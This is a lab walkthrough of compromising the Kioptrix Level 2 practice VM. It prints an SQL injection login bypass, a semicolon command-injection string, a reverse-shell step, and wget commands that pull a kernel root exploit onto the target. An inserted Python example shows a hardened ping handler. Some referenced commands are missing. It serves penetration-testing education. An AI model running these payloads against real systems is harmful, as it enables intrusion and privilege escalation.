Start your Kioptrix Level 2 (Kioptrix 1.1) VM and you will see a screen similar to the image below, which prompts for a login. Your task is to get a root shell and access all the files.
So your first step is to find the IP address of this machine, which you can easily get with the netdiscover tool by typing the following command in your terminal.
Note: Make sure that your Kali Linux machine and the Kioptrix VM are on the same NAT network.
@hackermuxam.edu.vn
As you can see, the following ports are in the open state:
From the initial scan, the SSH service is running on port 22, and the Apache service is running on port 80 and port 443, which is the interesting part for all of us.
Even more, on port 3306 a MySQL service is running, which means there should be some kind of DB connectivity, so the chances of SQL Injection are very HIGH.
On port 631, the CUPS service (Common Unix Printing System) is running, version 1.1. A quick Google search showed us that CUPS has had multiple vulnerabilities.
Let's also try pulling up the port 80/443 site in a browser, which shows some kind of login page.
So whenever you find a login page, your first step is to try bypassing it with a (string-based) SQL Injection. You can try the following payload:
Username – 'or''='
Password – 'or''='
This works because the first quote closes the string literal in the query and the appended condition ''='' is always true, so the WHERE clause matches regardless of the real credentials.
If you want to learn more about SQL Injection, I suggest you read this article by Chetan Soni.
Perfect! The SQL Injection worked and we are able to access the next page, which looks like a Ping command prompt!
We can test this Ping command prompt by trying to ping our Kali Linux machine (192.168.36.128).
Okay! It seems that the ping command works and that the PHP code is executing system commands. At this point, we can check whether the PHP script is vulnerable to Command Injection.
Back at the main Ping command page, let's go ahead and type: 192.168.36.128;ls;id;whoami
What this does is tell the system to run ping against our Kali Linux machine, and then, because the semicolon ends the ping command, run the ls, id and whoami commands as well.
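From the defender's side, the bug above is the classic pattern of concatenating user input into a shell command line. The Python below is an added example, not the Kioptrix PHP script (whose source is not shown here; the concatenation pattern is an assumption about it). It contrasts that pattern with a handler that validates the target as an IPv4 address and runs ping with an argv list so no shell ever parses the input, plus a small metacharacter check that can be run over logged ping targets.

```python
"""Injectable ping handler pattern beside a hardened one (added example)."""
import ipaddress
import subprocess


def vulnerable_ping_command(target: str) -> str:
    # Assumed shape of the vulnerable console: the target is pasted into a
    # shell command line, so ';' terminates ping and starts a new command.
    # Returned as a string for inspection; deliberately never executed here.
    return "ping -c 3 " + target


def build_ping_argv(target: str) -> list:
    """Return an argv list for ping, or raise ValueError for anything that
    is not a literal IPv4 address (covers ';', spaces, extra flags, names)."""
    try:
        addr = ipaddress.IPv4Address(target.strip())
    except ValueError as exc:
        raise ValueError(f"rejected ping target: {target!r}") from exc
    # List form: subprocess execs ping directly, no shell interprets the target.
    return ["ping", "-c", "3", str(addr)]


def run_ping(target: str) -> str:
    argv = build_ping_argv(target)  # raises before anything runs
    done = subprocess.run(argv, capture_output=True, text=True,
                          timeout=15, check=False)
    return done.stdout


def looks_injected(target: str) -> bool:
    """Log-review helper: flag shell metacharacters in a submitted target."""
    return any(ch in target for ch in ";|&`$()<>\n")


if __name__ == "__main__":
    payload = "192.168.36.128;ls;id;whoami"  # the exact string used above
    print("vulnerable command line:", vulnerable_ping_command(payload))
    print("flagged by log check:", looks_injected(payload))
    try:
        build_ping_argv(payload)
    except ValueError as err:
        print("hardened handler:", err)
    print("hardened argv:", build_ping_argv("192.168.36.128"))
```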
Nice! The script is vulnerable to command injection! Thus, we can go ahead and attempt to invoke a reverse shell.
Let's start by setting up a Netcat listener on port 1337 by typing the following command in your Kali Linux machine terminal.
Now, let's go back to the Ping console on the website and run the following command:
This will initiate a reverse TCP connection using bash to the IP address of your machine (192.168.36.128 in our case) on port 1337.
Perfect! We were able to connect to the victim's machine, and it seems that we are currently running as a normal (non-root) user account. Our next step from here is to carry out some privilege escalation to get access to the root account.
Let's start by checking what version of Linux the system is running, using the uname -a command.
After a quick Google search for that Linux version, we were able to find a privilege escalation exploit called ip_append_data() Ring0.
Download the exploit in your Kali Linux by typing the following command:
Command: cd /var/www/html/
Command: wget https://www.exploit-db.com/download/9542.c
Then restart the Apache service so that we can transfer the exploit directly from the Kali Linux machine to the Kioptrix machine.
But here's a small twist: you don't have permission to download any file into the root directory, so move to the /tmp folder and run the following commands:
Command: cd /tmp
Command: wget http://192.168.36.128/9542.c
Now it's time to compile the exploit with the GCC compiler and give the generated file 755 permissions.